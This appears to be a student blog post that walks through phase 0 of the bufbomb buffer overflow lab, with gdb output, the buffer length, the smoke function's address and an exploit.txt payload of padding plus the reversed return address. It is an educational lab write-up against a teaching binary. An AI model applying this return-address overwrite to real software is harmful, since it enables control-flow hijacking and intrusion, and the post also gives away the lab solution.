Introduction
organization. It involves applying a series of buffer overflow attacks on an executable file bufbomb.
Note: In this project, you will gain firsthand experience with one of the methods commonly used to exploit
security weaknesses in operating systems and network servers. Our purpose is to help you learn about the
runtime operation of programs and to understand the nature of this form of security weakness so that you
can avoid it when you write system code. We do not condone the use of this or any other form of attack to
gain unauthorized access to any system resources. There are criminal statutes governing such activities.
Logistics
As usual, this is an individual project.We generated the projet using gcc’s -m32 flag, so all code produced by the compiler follows IA-32 rules,
even if the host is an x86-64 system. This should be enough to convince you that the compiler can use any
calling convention it wants, so long as it’s consistent.
Hand Out Instructions
You can obtain your buffer bomb by pointing your Web browser at:
http://bert.cs.uic.edu:15213/ The server will return a tar file called buflab-handout.tar to your browser. Start by copying buflab-handout.tar to a (protected) directory in which you plan to do your work. Then give the com-
mand “tar xvf buflab-handout.tar”. This will create a directory called buflab-handout containing the following three executable files: After you untar your buflab you should direct your terminal to buflab-handout foloder
Example
[plueonde@bert buflab-handout]$Generate cookie : ./makecookie " your netid"[plueonde@bert buflab-handout]$ ./ makecookie plueon2
Test out the bufbomb:[plueonde@bert buflab-handout]$ ./bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Type string:abcdefg <= your string
Dud: getbuf returned 0x1 <=status
Better luck next timenow you have to check your buffer length , to do that just go to gdb bufbomb set breakpoint at getbuf[plueonde@bert buflab-handout]$ gdb bufbomb
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-45.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb...(no debugging symbols found)...done.
(gdb) b getbuf
Breakpoint 1 at 0x8049088
Run your cookie
(gdb) r -u plueon2
Starting program: /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Breakpoint 1, 0x08049088 in getbuf ()
Goal of pahse 0 is to overflow the buffer and inject the smoke address to the getbuf function
Check the length of the buffer: after you have the buffer length and the address of smoke quit the gdb bufbomb
(gdb) p/d ($ebp-$esp)
$1 = 40 <= length of the buffer
(gdb) disas smoke
Dump of assembler code for function smoke:
0x08048ca3 <smoke+0>: push %ebp <= address of the smoke function
0x08048ca4 <smoke+1>: mov %esp,%ebp
0x08048ca6 <smoke+3>: sub $0x8,%esp
0x08048ca9 <smoke+6>: movl $0x804a1db,(%esp)
0x08048cb0 <smoke+13>: call 0x80488d0 <puts@plt>
0x08048cb5 <smoke+18>: movl $0x0,(%esp)
0x08048cbc <smoke+25>: call 0x80490a0 <validate>
0x08048cc1 <smoke+30>: movl $0x0,(%esp)
0x08048cc8 <smoke+37>: call 0x8048930 <exit@plt>
End of assembler dump.
(gdb) quit
Next step create the buffer overflow to smoke function
using hex2raw to generate string
generate 61 indicating letter a in hexadecimal followed by the reverse address of the smoke function
[plueonde@bert buflab-handout]$ vim exploit.txt
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
a3 8c 04 08
Save the file and test it out
[plueonde@bert buflab-handout]$ cat exploit.txt | ./hex2raw | ./bufbomb -u plueon2
Userid: plueon2
Cookie: 0x34fd7256
Type string:Smoke!: You called smoke() <= complete the task
VALID
NICE JOB!
can u explain please when u say "using hex2raw to generate string"
ReplyDelete